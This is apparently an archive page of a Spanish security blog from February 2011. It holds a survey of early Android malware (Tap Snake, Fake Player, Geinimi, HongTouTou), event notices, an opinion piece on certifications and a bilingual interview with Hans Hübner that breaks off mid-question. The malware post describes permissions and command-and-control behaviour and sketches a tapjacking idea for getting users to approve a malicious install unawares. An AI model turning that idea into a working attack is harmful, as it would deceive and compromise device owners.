28 febrero 2011

Evolución del malware en dispositivos Android

Desde hace unos meses se ha podido observar cómo el desarrollo de malware ha sufrido un considerable aumento para dispositivos basados en el sistema operativo desarrollado por Google. Fruto de ello es en gran parte la laxitud por parte del usuario en temas de seguridad y el triunfo cada vez mayor en el uso de esta nueva plataforma.

Es un hecho indiscutible que cada vez las tareas cotidianas que realizábamos desde nuestro equipo personal queden relegadas a un segundo plano gracias a la comodidad y el confort que nos produce tener un dispositivo de capacidades similares y que podamos portar a cualquier sitio.

A esto le debemos sumar que la frontera que divide el uso personal del uso corporativo no está bien definida y por tanto su uso puede adoptar nuevas funcionalidades como el acceso a una VPN de la empresa, administrar el correo o manejar temas bancarios por poner sendos ejemplos. Es cuestión de tiempo que acabemos por tener la misma funcionalidad de un equipo en nuestro smartphone, algo más fácil ahora con la llegada de las tablets.

Esto es algo de lo que los desarrolladores de malware son bastante conscientes y que evidentemente no dejan pasar por alto, prueba de ello es la frecuencia con la que se están sucediendo nuevos ataques, cada vez más efectivos y elaborados.

El objetivo de esta entrada, es recoger a modo de resumen la evolución que se ha ido desarrollando en los últimos meses relacionada con aplicaciones maliciosas para sistemas Android.

Tap Snake


Fue el primer caso de malware recogido por la firma antivirus Symantec. Propagada a través del market como aplicación legítima, era un sustituto del conocido juego para móviles "Snake".


Entre sus permisos encontrábamos:
  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.ACCESS_FINE_LOCATION
Encargados de acceder a la localización del dispositivo a través del WiFi o GPS. Algo totalmente innecesario para la aplicación.

El objetivo de la misma era declarar un servicio llamado "SnakeService" que se instalaba en el dispositivo y se inicializaba en cada reinicio del terminal. Permaneciendo su ejecución en background, imposibilitaba salir de la aplicación, de esta forma recababa la información exacta de nuestra posición e informaba de la misma al servidor en intervalos de quince minutos o tras realizar un cambio de localización.



Posteriormente estos datos podían recuperarse y cotejarse con las coordenadas de Google Maps para geolocalizar al objetivo a través de la aplicación "GPS Spy" desarrollada por la misma empresa.

Fake Player


Este nuevo malware detectado por Dr. Web constituyó el primer caso real que afectó de manera

significativa a los usuarios de dispositivos Android. Se recibió el primer espécimen en Agosto del pasado año.

En este caso se sirvió de la premisa de ser un reproductor multimedia cuya funcionalidad nunca estaría presente en el código.

Entre sus permisos encontrábamos:
  • android.permission.SEND_SMS
Teniendo como objetivo el envío de mensajes SMS a números de tarificación especiales con un
coste aproximado de entre cuatro y seis dólares cada uno. Si bien estos resultaron proceder de Kazajistán (3353 y 3354), parecían no afectar a países que no tuvieran relación con el proveedor del servicio (Dalacom, Kcell, Mobile Telecom Service), este hecho unido al mensaje en ruso que enviaba, lo asociaban a Rusia como país de procedencia. Y por tanto confirmaba el hecho de no afectar al resto de países.

Al igual que "Tap Snake" se distribuyó por el market oficial de Google como una aplicación legítima, una vez se descubrió su cometido fue retirada del mismo. Es la primera aplicación que se tiene constancia que trate de lucrarse de forma ilegal a costa del usuario.

Geinimi


Analizado aquí en una entrada anterior, supuso un cambio de esquemas en lo referente al malware aparecido hasta el momento. Procedente china, se sirvieron de aplicaciones legítimas para distribuirlas por los markets chinos ilegales, infectando el código y empacando nuevamente el apk.

Para ello se escogieron las principales aplicaciones que tenían mayor éxito entre los usuarios: MonkeyJump2, Angry Birds, City Defense, y Baseball Superstarts 2010 entre otras.

Entre sus permisos destacábamos:
  • android.pemission.CALL_PHONE
  • android.permission.SEND_SMS
  • android.permission.READ_CONTACTS
  • android.permission.WRITE_SMS
  • android.permission.RECEIVE_SMS
Geinimi fue el primero en aplicar ofuscación de código y utilizar el algoritmo DES para cifrar las comunicaciones con el servidor, añadiendo una capa de complejidad no vista con anterioridad. Otra de sus características era montar un socket TCP en los puertos 5432, 4501 o 6543, utilizado para recibir los mensajes y actualizar la versión del malware en caso de que hubiera una superior.

También enviaba información privada a una serie de direcciones web quedando posteriormente en un estado de stand-by a la espera de recibir órdenes. Esto demostraba que nos encontrábamos ante el primer caso de malware que transformaba nuestro dispositivo en un bot. En total se llegaron a contar cerca de una veintena de comandos.

HongTouTou

Último malware aparecido, en esta ocasión repetía el mismo patrón de infección que
Geinimi, utilizando aplicaciones de terceros legítimas para infectar su código y distribuirse por markets de dudosa reputación. Aplicaciones como RoboDefense y algunos wallpapers fueron las escogidas.

En esta ocasión solicitaba los siguientes permisos:
  • android.permission.WRITE_APN_SETTINGS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.READ_PHONE_STATE
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.INTERNET
  • android.permission.MODIFY_PHONE_STATE
Una vez el teléfono era iniciado enviaba información privada como el IMEI y el IMSI a un servidor remoto, a lo que respondía enviando un conjunto de direcciones procedentes de un motor de búsqueda y un conjunto de palabras claves para usarlas posteriormente simulando procesos de búsqueda de forma inocua al usuario y conseguir llevar los resultados al primer puesto emulando clicks en los resultados deseados.

Tal y como sucedía con Geinimi, una de sus funcionalidades era la posibilidad de descargarse un APK llamado "myupdate.apk" para actualizar la versión del malware a la más reciente. Además de controlar en todo momento el tipo de red que usábamos en el teléfono e informar de ello al servidor.

Se terminó asociando su procedencia con China, debido a que utilizaba redes originarias de allí como "cmnet", "cmwap" (China Mobile Net), "uniwap" y "uninet" (China Unicom).

Hardening Android


Como siempre la responsabilidad final recae en manos del usuario, él es quien tiene la decisión de qué aplicaciones instalar o no en su dispositivo. Pero... ¿Existe realmente la posibilidad de estar a salvo de cualquier amenaza?

Independientemente de las soluciones antivirus que tan de moda se están poniendo en los últimos días, hay una serie de consejos que probablemente ayuden a prevenir cualquier foco de infección:
  • Descarga sólo aplicaciones de fuentes confiables como pueden ser los markets oficiales, y recuerda revisar las descripciones, comentarios y rating con los que son calificadas por los usuarios.
  • Revisa siempre los permisos que solicita una aplicación para ser instalada. Usa el sentido común para relacionar que los permisos son equiparables a la funcionalidad de la misma.
  • Vigila cualquier comportamiento raro que pueda hacer tu teléfono, como actividades inusuales en las conexiones, llamadas a números desconocidos o envío de mensajes SMS.
Compañías como Aegis, Symantec, Lookout, han sacado aplicaciones destinadas a combatir el malware en smartphones, además de incluir funcionalidades extras como la realización de backups, aplicar reglas como el bloqueo de llamadas a números, posibilidad de encontrar dispositivos perdidos, etc.

En lo que respecta a mi opinión personal, creo que un usuario bien concienciado es más que suficiente para mantener a salvo su teléfono, y que realmente las soluciones antivirus que se nos ofrecen no están preparadas para combatir el malware como tal. Dudo sinceramente que se aplique verdadera heurística y se busquen patrones de infección. Más bien lo veo como la oportunidad de vender un producto con funcionalidades adicionales.

Conclusión


Es evidente que se ha ido añadiendo mayor complejidad y funcionalidad, cada nuevo espécimen de malware que aparece se aprovecha de lo utilizado por el anterior e incluye nuevas funcionalidades que añaden una capa de complejidad mayor.

Si a todo esto le añadimos los fallos de seguridad que se han ido sucediendo, podemos obtener una combinación digna de festín.

Ahora mismo hay una barrera que evita la instalación de malware a mansalva y son los permisos. Para que una aplicación sea instalada, un usuario debe de dar su consentimiento. Pero... ¿Es posible evitarlos?

En un principio no, estos deben ser declarados en el AndroidManifest.xml y no hay forma alguna de añadir o retirar un permiso mediante técnicas de programación. Pero hace un par de meses el equipo de investigación de Lookout descubrió un fallo de seguridad que permitía realizar TapJacking (similar al clickjacking).



Se me ocurrió que esta sería una forma posible de eludir los permisos de una aplicación creando un vector de ataque basado en una aplicación legítima como un juego de machacar gatitos, y que por detrás se descargara nuestra aplicación maliciosa y se procediera a la instalación de la misma, de manera que en ningún momento el usuario fuera consciente y que aceptara los permisos de esta a raíz de las pulsaciones que realizara en la pantalla.

Ya hemos evitado esa pequeña barrera. ¿Cuánto tiempo pasará hasta que nos encontremos con aplicaciones que se aprovechen de estas vulnerabilidades?

-------------
 Contribución por Sebastián Guerrero
Leer más...

27 febrero 2011

Enlaces de la SECmana - 60


    Leer más...

    24 febrero 2011

    Presentación sobre seguridad en PDF.

    Después de dar las charlas en Adwys2011, Cádiz y GSIC, Coruña, dejo por aquí el material que he utilizado para la presentación y el vídeo de la demo, en el que utilizando Metasploit, se explota una vulnerabilidad en un Adobe Reader 9.





    Leer más...

    [Intypedia] Lección 5. Seguridad perimetral

    Como anunciamos hace algún tiempo Intypedía es una enciclopedia virtual en la que en mediante distintos capítulos Alicia y Bob explican conceptos de seguridad. 

    En el número 5 publicado ayer, yo mismo he colaborado con la elaboración del guión, presentación, ejercicios y composición en general.

    Mucho me hubiera gustado haberme parecido al gran Tarantino, pero desgraciadamente la seguridad perimetral no toca temas tan divertidos como mujeres en mono amarillo u hostales en la Europa del este.

    Aun así, he puesto todas mis ganas e ilusión en este interesante y novedoso proyecto con el único objetivo de que a todos aquellos que lo vean les pueda enseñar algo nuevo.

    Estoy convencido que Alicia y Bob son el Malder y Scully de la seguridad del siglo XXI. Sin más, os dejo el próximo premio Sundance:




    Link original en Youtube: http://www.youtube.com/watch?v=sxg1nq17xj4&feature=player_embedded
    Leer más...

    22 febrero 2011

    Últimas plazas para RootedLabs 2011


    Estamos a apenas 6 días de adentrarnos en la semana Rooted, y desde la organización nos llega esta información sobre las últimas plazas disponibles (apenas 10) para los RootedLabs de este año, que pasamos a adjuntar a continuación:

    -----------------------------------

    Últimas plazas disponibles a falta de una semana

    No deberías dejar de aprovechar esta oportunidad! Estás a tiempo de formar parte de unos cursos de formación de un día de duración, con unos profesores de excepción, y aprender con el mejor ambiente posible. 

    En una semana darán comienzo las RootedLabs 2011, y el apoyo ha sido increíble: Más de 120 asistentes asistirán a clases magistrales sobre ingeniería inversa, informática forense, seguridad en web y redes, además de en tecnologías móviles, con profesionales de la talla de Joxean Koret, Pedro Sánchez, Chema Alonso, Alejandro Ramos, José Selvi, David Pérez, José Picó y Raúl Siles de Taddong, Juan Luis G. Rambla y Juan Garrido.

    Quedan menos de 10 plazas disponibles para alcanzar el cupo en todos los cursos, ¡date prisa!

    -----------------------------------

    Ya contamos con los ponentes y ponencias confirmadas para esta edición, que reunirá a casi 600 personas en pleno centro de Madrid durante los días 3, 4 y 5 de Marzo.

    Os podemos adelantar que, por supuesto, Security By Default estará allí, y no sólo para cubrir el evento como ya se hizo el año pasado...

    [+] RootedCON
    [+] RootedLabs

    Leer más...

    21 febrero 2011

    ¿Qué buscamos en una certificación de seguridad?

    Está claro que los objetivos de la felicidad humana, comportan un equilibrio entre estar contentos en el terreno personal y por supuesto, en el profesional. Al fin y al cabo es donde pasamos una gran parte del tiempo y es imprescindible sentirnos lo más cómodos y realizados posibles. Por ello, es importante que la elección que hagamos sea lo más adecuada posible y que, dedicándonos a la seguridad, donde hay diferentes ramas, acertemos el tiro a lo que nos resulte más atractivo y con salidas laborales.

    Hace tiempo, quisimos dar en SbD una guía para ayudar a la trayectoria profesional de aquellos lectores que quieran mejorar su titulación y conocimientos. Para ello resumimos las certificaciones oficiales más reconocidas, indicando si la misma es técnica o no, si está dedicada a auditoría, consultoría, gestión, etc,… requisitos como experiencia previa, etc,…. para saber por dónde tirar.

    Sin embargo, ¿qué es lo que buscamos en este tipo de posgrados o especializaciones? Tal cual están los tiempos en los que las empresas están sobredimensionando un montón los requisitos de los candidatos y que piden un consultor "Ferrari" para cubrir un puesto que lo pueden hacer con uno de tipo "Dacia Logan" (sin ánimo de ofender a los propietarios de un Dacia Logan), está claro que cuanto mayor sea el palmarés de titulaciones que tengamos, mejor. Sin embargo, creo que en el momento de buscar formación complementaria a la actual, además del reconocimiento y la ventaja a la hora de encontrar cuanto antes un puesto de trabajo en el que seamos felices, nos debería mover el saber que lo que vamos a aprender en dicha certificación nos valga para algo en la vida real y práctica.

    Desde mi punto de vista y mi experiencia (sólo cuento con dos certificaciones de las reconocidas: CISSP y CISA), el haber pasado por un montón de tiempo de estudio en ambas y sabiendo que CISSP es "mucho más" técnica que CISA y que esta última, además está más enfocada al mundo de la auditoría, no termino de obtener un beneficio claro de la inversión de tantas horas y sesiones de estudio. En realidad, mientras devoraba los manuales y libros oficiales de las mismas, enlazaba aspectos o situaciones de la vida real que me habían ocurrido y me ocurren en mi entorno laboral, más que aprender cosas en las que yo pienso que puedo sacar provecho en un futuro.

    Efectivamente, ambas certificaciones están muy reconocidas en el mundo de la seguridad informática y supongo que son de las más priorizadas a la hora de obtener alguna, pero creo que el hambre a saciar por mi parte, era más de contenido técnico que otra cosa. Por eso creo que la siguiente a obtener después de las del ISC2 e ISACA, debería ser algo más dedicado a lo que realmente me gusta como CEH, CHFI o quizá alguna de las de GIAC/SANS.

    De esta manera, además de cubrir los requisitos de búsqueda que muchos headhunters utilizan en base a buscar profesionales cualificados en Linkedin filtrando por CISSP y CISA, habré disfrutado de una lectura y práctica con más contenido técnico que sienta que me aporta realmente algo más que simplemente quedar formal y serio en el CV.

    Como no todos somos iguales, quizá vosotros tengáis una forma diferente de pensar. Unos defenderán la necesidad de saciar el hambre de conocimiento por encima de todo en primer lugar, y otros se guiarán más por la necesidad de encontrar un trabajo mejor, y lo verán como un "must" a tener en cuenta para sumar puntos a la hora de ser el finalista elegido dada la compleja situación laboral actual (al menos en España).

    Dado que estas certificaciones suponen una importante inversión en términos de tiempo y dinero, está claro que aunque las queramos tener todas, hay que priorizar y cortar por algún sitio.

    Es evidente, que dependiendo del perfil demandado por las empresas que abren un proceso de selección, buscarán por consultores cualificados con unas u otras certificaciones,... pero ¿qué preferimos nosotros?
    Leer más...

    20 febrero 2011

    Enlaces de la SECmana - 59


    Leer más...

    19 febrero 2011

    Web Browsers Traces Eraser, limpia trazas allá donde vayas

    A través de la lista de herramientas desarrolladas por NoVirusThanks nos encontramos con Web Browsers Traces Eraser, un programa que nos ayuda a limpiar los datos de los navegadores más populares.

    La lista de programas soportados por la herramienta es amplia, contando con más de 10 navegadores diferentes, entre los que se encuentran Firefox, IE, Opera, Safari y Chrome. Además, también nos permite eliminar trazas de Flash Player, Java, así como algunos datos del propio exporador de Windows.

    Cuando lo iniciamos, el programa escanea el equipo en busca de trazas y las marca en el menú para que sean eliminadas.


    Probablemente lo mejor de todo, es que además del instalador han lanzado una versión portable para que podamos llevarlo en el pendrive, lo cual resulta muy cómodo a la hora de limpiar los datos de un ordenador ajeno que hayamos usado.

    Funciona en sistemas Windows de 32 y 64 bits.

    Descarga (Instalador - Portable)
    Leer más...

    18 febrero 2011

    Entrevista a Hans Hübner (pengo)

    Justamente, acabábamos el año en SecurityByDefault con un post de nuestra serie [Cine de Hackers], en la que Alex nos presentaba la película "23 - Nada es lo que parece":
    23 Nada es lo que parece narra la historia de Karl Koch, un hacker alemán conocido como Hagbard Celine, que en los años 80 vendió información al KGB en plena guerra fría.
    En dicha película, aún centrándose en la historia de Karl Koch, también pudimos conocer a David, personaje ficticio, pero que representaría a los otros dos hackers pertenecientes al grupo (denominado "Wily Hackers" por la prensa): Markus Hess (alias  Urmel, corresponde con el hacker perseguido en la historia de El Huevo del Cuco de Clifford Stoll) y Hans Hübner (alias pengo). Este último quizás fue el miembro posteriormente "más castigado" por parte de la comunidad hacker debido a todo lo ocurrido con el caso KGB.

    Se puso en duda su "ética hacker" y fue recriminado públicamente por el mismísimo Wau Holland (uno de los fundadores del Chaos Computer Club), como se relata en el libro “Llaneros solitarios” - Hackers, La guerrilla informática. Muchos rumores apuntaban a que fueron los propios Karl y Hans los que confesaron los hechos a las autoridades (en la película de '23' ya se reflejaba algo en su parte final...). Una vez este caso de hacking saliese a los medios a finales de los 80, tuvo lugar el juicio contra estos hackers, aunque ya sabemos el desenlace fatal de Karl Koch.

    En este artículo de la Phrack #25, tendréis recopilados y ordenados cronológicamente varias notas de prensa y mensajes de listas de correo sobre el caso que en esos momentos era plena actualidad (Marzo de 1989), incluso una carta del propio pengo en RISKS en el que reprochaba a la prensa la filtración de los nombres y apellidos de todos ellos, algo que no vino nada bien para su vida cotidiana (y menos encontrándose todavía en pleno juicio por el caso).

    Hemos tenido la gran suerte de poder contactar con Hans "pengo" Hübner, y poder formularle algunas preguntas sobre pasado y presente, que muy amablemente ha contestado. No todos los días se tiene la oportunidad de "conocer" un poco más a miembros de la primera época del CCC con una historia llevada al cine y protagonistas de hackeos tan memorables para la época. ¿Cualquier tiempo pasado fue mejor? Veamos que opina Hans al respecto de esto y otras muchas cosas:

    Hans Hübner, foto cortesía de Olaf Langmack

    Lo primero de todo, gracias por dejarnos "robarte" tiempo para esta entrevista. Fuiste uno de los primeros miembros del Chaos Computer Club desde sus inicios. Cuéntanos, ¿cómo era? ¿Sigues en contacto con miembros de la época?

    Cuando me puse en contacto con el CCC a finales de los años 80, ya había llegado a ser bien conocido por lo ocurrido con BTX y HASPA. Se basaba en Hamburgo, y abrió algo así como una sede en Berlín (que en realidad no era más que una dirección de correo en una tienda de discos cerca de mi colegio y el llevar a cabo reuniones semanales en un bar). El CCC, como organización, es y era un canal cara al público para lo underground de la informática. Yo estaba más interesado en la parte activista que en lo político, por lo que en esos días, mi afiliación era algo informal.

    Todo esto sólo cambió hasta después de que la historia del KGB se hiciese pública, y el CCC, es decir, Wau Holland, dijese que nosotros (la gente involucrada en el caso de la KGB) no eramos hackers. Me uní oficialmente al CCC en ese momento e incluso me convertí en miembro del consejo, motivado por la sensación de que a pesar de que había hecho algo mal, todavía eramos hackers.

    Hoy en día, me encuentro con antiguos miembros del CCC de vez en cuando, pero aquella generación de hackers se ha disuelto del todo y todo el mundo ya se ocupa de sus propios asuntos.

    ¿Qué opinas sobre las ediciones recientes del congreso? Sin tener en cuenta el número de asistentes, ¿crees que existen otras diferencias más significativas con respecto a las primeras ediciones o sigue teniendo un sentimiento parecido sobre movimientos sociales, tecnológicos y concienciación sobre hacking? 

    Creo que el congreso es básicamente lo mismo que era en los años 1990. Ha crecido, pero como en el pasado, es un lugar donde el underground se reune bajo el amparo de una organización que proporciona un canal al público general. Creo que hubo y hay bastante escepticismo por el underground hacia la CCC como organización, y muchos ven quizás la organización del CCC demasiado involucrada y presente en los medios de comunicación. Por lo menos ese era mi punto de vista, y tras contactar con algunos otros activistas me dió la impresión de que esta idea era generalizada. Por otra parte, el congreso es una gran oportunidad para conocer a gente con ideas afines, por lo que todavía cumple con su propósito.

    Ahora que Wikileaks y Julian Assange están más presentes en los medios de comunicación, y sabiendo que él también perteneció al club, ¿le llegaste a conocer? ¿Estaba en tu mismo círculo (como ocurrió con Karl) o simplemente era "otro miembro" para tí como el resto?

    No había oído el nombre de Julian Assange hasta el año pasado, pero eso no significa que pudiese haber coincidido con él -en línea- antes. Él es de casi la misma generación que yo, y en los años de lo de la KGB, me encontré con varios hackers de Australia por lo que no es del todo improbable que me haya topado con con él, también. De hecho, Julián Assange es uno de los autores del libro "Underground", libro que descubrí el año pasado (bueno, y el hecho de que él es uno de los autores es algo de lo que no me había dado cuenta hasta hace 2 minutos :) ), por lo que por lo menos sabe algo acerca de mí. Quizás es que me conoce “de segunda mano”.

    ¿Sigues involucrado en temas de seguridad? Quizás no como los viejos tiempos, pero si interesado en la temática, manteniéndote informado a través de blogs de seguridad, portales, listas de correo, atendiendo a congresos de seguridad...

    No, yo no estaba interesado en la seguridad como tal. La seguridad informática es algo que me doy cuenta que se interpone entre mi y la diversión. Romper las medidas de seguridad era algo que hice con el fin de tener acceso a las máquinas con las que quería jugar. Mi interés real radica en la arquitectura y programación de sistemas. Antes, la única manera de poder utilizar ordenadores interesantes era "irrumpiendo" en ellos.

    Empezaste en esto del hacking cuando tenías unos 16 años, y la tecnología no estaba tan a mano como hoy en día. Incluso teniendo en cuenta las facilidades de las que disponemos actualmente para acercarnos al mundo tecnologíco, ¿sigues prefiriendo los "viejos tiempos"?

    Tengo buenos recuerdos de los sistemas de los años 1990. Me gusta la idea de crear una máquina, hardware y software, que formen una unidad arquitectónica y un bello conjunto. Hoy las computadoras no son generalmente creados teniendo en mente la "belleza", y desde esa perspectiva, si que los "viejos tiempos" eran mejores. Yo por lo general no "prefiero" los viejos tiempos, sin embargo: Todavía es posible divertirse con los sistemas actuales, y a pesar de que rara vez se puede trastear con sistemas “bonitos” actuales, todavía se siguen creando (como, por ejemplo, el chip GA144 el cual admiro mucho). Además en la actualidad, Internet es, básicamente, nuestros sueños de finales de los años '80 hechos realidad.

    Así que, sí, algunas cosas en el pasado eran mejores, pero no me decanto por volver a lo de antes.

    Sobre el tema del "KGB", ¿fue complicado "reiniciar" tu vida después del último testimonio que publicaste en la publicación RISKS y todo lo que se dijo de ti, profesional y personalmente hablando?

    Recuerda que era todavía un adolescente cuando me convertí en hacker. No tenía que “reiniciar” nada, y mi vida simplemente siguió su cauce. Co-fundé una compañía cuando salió a la luz todo lo del KGB a la palestra y mis compañeros no querían contar más conmigo.

    Yo era percibido como un traidor por aquellas personas que no estuvieron involucradas en el caso, pero pensaba que sabían lo que estaba pasando. Pasé mucho tiempo pensando en mi papel y la vida siendo hacker, cuando tendría que estar pensando en construir mi carrera e ir a la universidad.

    En el ámbito profesional, me convertí en programador “freelance” y sigo en ello hoy en día. Sigo teniendo pasión por la informática y por la programación, y todo lo ocurrido con el tema KGB probablemente amplió mi personalidad de manera que me ayudó a encontrar nuevos trabajos. Aún a día de hoy, a veces pienso que una carrera algo más regular hubiese sido mejor para tener la mente más tranquila..

    En la GALACTIC HACKER PARTY (Amsterdam - 1989), Wau Holland (uno de los fundadores del CCC) mantuvo una discusión contigo sobre la ética hacker y sobre lo que ocurrió en el asunto KGB (y la "información sensible" que supuestamente se facilitó), e incluso recriminó que estos hechos iban en contra de los ideales o espíritu del CCC. ¿Te esperabas tales acusaciones en público? ¿Cómo te sentiste en aquel momento? 

    Critiqué la versión del CCC sobre la “ética hacker” porque decían que la información quería y debería ser libre, pero la “información privada” debería protegerse. Creo que el concepto equivocado ahí es la palabra “privada”. Entiendo que tener privacidad en el ámbito digital es algo que la mayoría de la gente desearía tener, pero pienso que esa gente que tiene mayores conocimientos debería concienciar al resto de que esto no es más que una ilusión. Creo que mis esperanzas de que el CCC fuese un lugar en el que todo el mundo supiese que estaba ocurriendo realmente (y hablar sobre ello, también) era un poco ingenuo.

    ¿Tuviste amigos cercanos que te apoyasen y entendiesen tu postura al 100% tras lo ocurrido? 

    En realidad no - Cuando me convertí en hacker, me alejé un poco de mi vida social anterior. Como comenté, tenía veintipico años, por lo que no tenía mucho a lo que volver.

    ¿Has contactado de nuevo con Markus Hess después de todo lo ocurrido? Leyendo la transcripción de una entrevista telefónica a él por parte de PHRACK, no quería ni saber ni hablar sobre el tema nunca más.

    No, después de que lo de la KGB saliese a la luz no le volví a ver. De hecho, sólo le ví en contadas ocasiones cuando visitaba a Karl en Hannover, por lo que no hemos tenido tampoco un trato cercano.



    Colaboraste con el guión de la película "23". ¿Es cierto que el papel del personaje "David" (interpretado por Fabian Busch) fue un personaje basado tanto en la vida y esperiencia de Markus Hess como la tuya? ¿Nos puedes comentar alguna anécdota del rodaje?

    En el momento en que se hizo la película, toda la historia ya era pasada. Al ver el set de filmación y los localizaciones originales en el contexto de la historia, sentía como si hubiese viajado en el tiempo. En retrospectiva, la película ha influido mucho en mi modo de ver toda esa historia, y tanto August Diehl como Fabian Busch siempre me han parecido como si saliesen de mi propia historia en lugar de ser simplemente actores. Cuando conocí a Fabian en el set, me pareció irritante verle fumando tabaco de liar tal y como me ocurría en aquellos tiempos. Hizo un gran trabajo en capturar una gran parte de mí mismo en su papel de David.

    En realidad, no considero '23' una película de hackers. Más bien, es el retrato de Karl como un joven luchador, que es lo que en realidad trata de plasmar esta primeriza obra de Christian Schmid. Creo que hizo un buen trabajo.

    ¿Qué nos puedes decir sobre tu vida cotidiana con la tecnología? Quiero decir, ¿te preocupa tu seguridad personal, eres paranoico con tu información, privacidad, cifras tu disco y demás, o prefieres preocuparte de otros temas?

    Yo no soy para nada paranoico, y prefiero no preocuparme (aunque sin duda a veces lo hago). No creo en la seguridad informática con el hardware actual. Hay muchos componentes que son vulnerables, y no tengo ninguna confianza en la industria de semiconductores y software en general. He visto a organismos gubernamentales implantar puertas traseras en los sistemas operativos a principios de los años 1990, y no tengo motivos para creer que tales prácticas se hayan detenido.

    La seguridad informática lo tiene dificil conmigo.

    ----------------------------------------------------------------------------------------------------------


    A continuación dejamos la entrevista original con Hans Hübner, en inglés:


    > First of all, thanks for letting us "steal" your time for this interview.
    > You were a former member of Chaos Computer Club since its very beginning,
    > tell us how it was? Do you keep in touch with other former members?


    When I got in touch with the CCC in the late 1980ies, it had already
    become well known through the BTX and HASPA coups.  It was based in
    Hamburg, and kind of opened a branch in Berlin (which was actually no
    more than a mailing address in a record shop near my school and a
    weekly meeting in a pub).  The CCC, as an organization, understood
    itself as being a channel into the public for the computer
    underground.  I was more of an activist and less of a politician, so
    in those days, my membership was only informal.


    This only changed until after the KGB story had made it into the
    public and the CCC, namely Wau Holland, claimed that we (the people
    involved in the KGB case) were "not hackers".  I officially joined the
    CCC at that point and even became a member of the board, motivated by
    the feeling that even though we had done something wrong, we were
    still hackers.


    Nowadays, I meet former CCC members now and then, but that hacker
    generation has mostly dissolved and everybody is doing their own
    thing.


    > What do you think about recent editions of the congress? Besides the number
    > of people which attendes, do you think there are more significant
    > differences between first editions or the feeling of social movements,
    > technology and hacking awareness is quiet the same?


    I think that the congress is basically the same as it was back in the
    1990ies.  It has grown, but as in the past, it is a place for the
    underground to meet under the cover of an organization that provides a
    channel into the general public.  I think that there was and is quite
    some scepticism from the underground towards the CCC as an
    organization, and many see everyone involved in the CCC as being too
    media focused and too much being part of the establishment itself.  At
    least that was my view, and from a few contacts to activists I get the
    impression that this is still a common view.  Then again, the congress
    is a great opportunity to meet like-minded people, so it still
    fulfills its purpose.


    > Now that Wikileaks and Julian Assange are more presence in the media, and
    > knowing that he also belonged also to the club, did you know him? were you
    > close to him (as with Karl) or he was just "another member" for you like the
    > others?


    I have not heard the name Julian Assange before last year, but that
    does not necessarily mean that I have not met him - online - before.
    He is from almost the same generation as myself, and in the KGB years,
    I met several australian hackers so it is not totally unlikely that I
    have met him, too.  In fact, Julian Assange is one of the authors of
    the "Underground" book that I've only found last year (well, and the
    fact that he's one of the authors is something I did not realise until
    2 minutes ago :) ), so at least he knows something about me.  Might be
    second-hand knowledge anyway.


    > Are you still involved in security? Maybe not like "old times", but
    > interested in security topics, keeping updated with security blogs, portals,
    > mailing-lists , attending security conferences...


    No.  I was never interested in security itself.  Computer security is
    something that I perceive as being in between me and the fun.
    Breaking security measures was something that I did in order to get
    access to machines that I wanted to play with.  My interest is
    computer architecture and systems programming.  Back in the day, the
    only way to get to use interesting computers was to break into them.


    > You started hacking when you were about sixteen years old, technology wasn't
    > so affordable like nowadays. Even taking into account the facilities that
    > are available today to approach the world of technology, do you still prefer
    > 'old times'?


    I have fond memories of the systems of the 1990ies.  I like the idea
    of creating a machine, hardware and software, that form an
    architectural unity and a beautiful whole.  Today's computers are not
    generally created with beauty in mind, and from that perspective, the
    "old times" were better.  I don't generally "prefer" the old times,
    though:  It is still possible to have fun with today's systems, and
    even though one can rarely look at beautiful systems today, they are
    still being created (like, for example, the GA144 chip which I really
    admire).  Also, the Internet today is basically our dreams of the late
    1980ies come true.


    So, yes, some things in the past were nice, but I'm not looking back
    to turn back.


    > Related to the "KGB" issue, was it hard to "reset" your life after your last
    > testimony in RISKS digest and everything that was told about you,
    > professionally and personally speaking?


    Remember that I was still a teenager when I became a hacker.  I had
    nothing to "reset" back to, and my life went on.  I had co-founded a
    company when the KGB story surfaced and my partners did not want to
    have me in there anymore.


    I was perceived as a traitor by people that were not involved in the
    case but thought they know what was going on.  I spent a lot of time
    thinking about my role and life as a hacker, when I had better be
    thinking about building a career and visiting the university.


    Professionally, I became a freelance programmer and this is what I
    still do.  I still love computers and programming, and the whole KGB
    thing probably added to my personality in ways that also helped me
    find new jobs.  Still, I sometimes think that a more regular career
    would have been nice for peace of mind.


    > In the GALACTIC HACKER PARTY (Amsterdam - 1989), Wau Holland (one of the
    > founders of CCC) discussed with you about hacker ethics and what happened
    > about the sensitive information of "KGB hacks", and he said that these facts
    > were against CCC ideals. Were you expecting such public acussation? How did
    > you feel in that moment?


    I was very offended.  I never believed in the "hacker ethics" being
    the universal conduct for everyone calling themselves a hacker.  His
    claim that we were not hackers motivated me to join the CCC in the
    first place, but after a few years as a CCC member and also as a CCC
    board member I was rather disillusioned.


    I criticized the CCC version of the "hacker ethics" because it claimed
    both that information wants to and should be free, but "private data"
    should be protected.  I think that the whole idea of data that is
    "private" is wrong.  I understand that having privacy in the digital
    domain is something that most people would rather want to have, yet I
    think that those people who should know better should educate the rest
    that this is just wishful thinking.  I think that my hopes for the CCC
    being a place for people who know what's going on (and talk about it,
    too) was a bit naive.


    > Had you any close friends which support you and understand you 100% after
    > what happened?


    Not really - When I became a hacker, I pretty much got detached from
    my former social circle.  Again, I was in my very early 20ies, so I
    did not have much to return to.


    > Have you contact again with Markus Hess after what happened? Reading a
    > transcribed phone interview to him from PHRACK (link to that), he didn't
    > want to know/talk anything about this stuff anymore.


    No.  I have never met him after the KGB story surfaced.  In fact, I
    have only met him a few times when I visited Karl in Hannover, so we
    have not been close.


    > You collaborated with the script of the '23' movie. Is it true that the role
    > of 'David', (played by Fabian Busch) was a character based both on Markus
    > Hess and you? Any anecdotes during the filming?


    At the time when the film was made, the whole story already was way
    back in the past.  Seeing the film set and the original locations in
    the context of the story was feeling like kind of time travel.  In
    retrospect, the film has influenced my view on the whole story a lot,
    and both August Diehl and Fabian Busch always appear to me as coming
    out of my own story rather than being just actors.  When I met Fabian
    on the set, I found it rather irritating to see him smoke self-rolled
    cigarettes as I did back in the day.  He did a great job in capturing
    a large part of myself in his role as David.


    Overall, '23' is not so much of a hacker film.  Rather, it is a
    portrait of Karl as a struggling young man, which is what Christian
    Schmid's early oevre is all about.  I think he did a good job.


    > What about your every-day technology life? I mean, are you worry about your
    > computers, very paranoid about your data, privacy, disk encrypting and so
